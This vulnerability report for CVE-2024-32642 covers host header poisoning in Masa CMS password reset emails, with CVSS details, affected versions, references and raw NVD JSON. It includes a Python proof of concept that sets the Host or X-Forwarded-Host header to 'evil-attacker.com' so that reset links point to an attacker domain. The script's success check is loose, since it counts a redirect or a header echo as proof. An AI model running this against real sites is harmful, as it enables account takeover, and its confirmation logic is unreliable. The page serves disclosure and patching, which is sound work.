Security Vulnerability Report
CVE-2024-32642 CVSS 8.8 HIGH

CVE-2024-32642

Published: 2025-12-03 17:15:49
Last Modified: 2025-12-05 15:36:03

Description

Masa CMS is an open source Enterprise Content Management platform. Prior to 7.2.8, 7.3.13, and 7.4.6, it is vulnerable to host header poisoning, which allows account takeover via the password reset email. This vulnerability is fixed in 7.2.8, 7.3.13, and 7.4.6.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:masacms:masacms:*:*:*:*:*:*:*:* - VULNERABLE - Masa CMS < 7.2.8
cpe:2.3:a:masacms:masacms:*:*:*:*:*:*:*:* - VULNERABLE - Masa CMS >= 7.3, < 7.3.13
cpe:2.3:a:masacms:masacms:*:*:*:*:*:*:*:* - VULNERABLE - Masa CMS >= 7.4.0, < 7.4.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# CVE-2024-32642 PoC - Host Header Poisoning for Account Takeover
# Target: Masa CMS < 7.2.8, 7.3.13, 7.4.6

target_url = "http://target-site.com/index.cfm/fuseaction/users.lostpassword"
payload_host = "evil-attacker.com"

headers = {
    "Host": payload_host,
    "User-Agent": "Mozilla/5.0",
    "Accept": "text/html,application/xhtml+xml",
}

response = requests.post(
    target_url,
    headers=headers,
    data={
        "email": "[email protected]",
        "submit": "Submit"
    },
    allow_redirects=False,
    verify=False
)

# Check if the password reset email contains the attacker's domain
if payload_host in response.text or response.status_code == 302:
    print(f"[+] Host Header Poisoning vulnerability confirmed!")
    print(f"[+] Malicious host injected: {payload_host}")
    print(f"[*] Check email for password reset link pointing to {payload_host}")
else:
    print("[-] Vulnerability not detected or target not vulnerable")

# Alternative: Check for X-Forwarded-Host header injection
alt_headers = {
    "Host": "legitimate-site.com",
    "X-Forwarded-Host": payload_host,
    "User-Agent": "Mozilla/5.0",
}

response2 = requests.post(
    target_url,
    headers=alt_headers,
    data={"email": "[email protected]", "submit": "Submit"},
    allow_redirects=False,
    verify=False
)

if payload_host in str(response2.headers):
    print(f"[+] X-Forwarded-Host injection also works!")
```

References

https://github.com/MasaCMS/MasaCMS/commit/7541b9c99fb9e32d1de6f2658750525cec1d8960 (Patch)
https://github.com/MasaCMS/MasaCMS/security/advisories/GHSA-qjm6-c8hx-ffh8 (Exploit, Vendor Advisory)

Raw JSON Data

```json
{"cve": {"id": "CVE-2024-32642", "sourceIdentifier": "[email protected]", "published": "2025-12-03T17:15:48.543", "lastModified": "2025-12-05T15:36:02.963", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Masa CMS is an open source Enterprise Content Management platform. Prior to 7.2.8, 7.3.13, and 7.4.6, there is vulnerable to host header poisoning which allows account takeover via password reset email. This vulnerability is fixed in 7.2.8, 7.3.13, and 7.4.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-346"}, {"lang": "en", "value": "CWE-640"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:masacms:masacms:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.2.8", "matchCriteriaId": "82A74C33-3407-498A-9444-4A451E5968FE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:masacms:masacms:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.3", "versionEndExcluding": "7.3.13", "matchCriteriaId": "45C4FA2D-DCEF-4991-B21D-C2BAC3A9DF5C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:masacms:masacms:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.4.0", "versionEndExcluding": "7.4.6", "matchCriteriaId": "ED61DA62-94D4-4081-923F-2674CFC7945A"}]}]}], "references": [{"url": "https://github.com/MasaCMS/MasaCMS/commit/7541b9c99fb9e32d1de6f2658750525cec1d8960", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/MasaCMS/MasaCMS/security/advisories/GHSA-qjm6-c8hx-ffh8", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}
```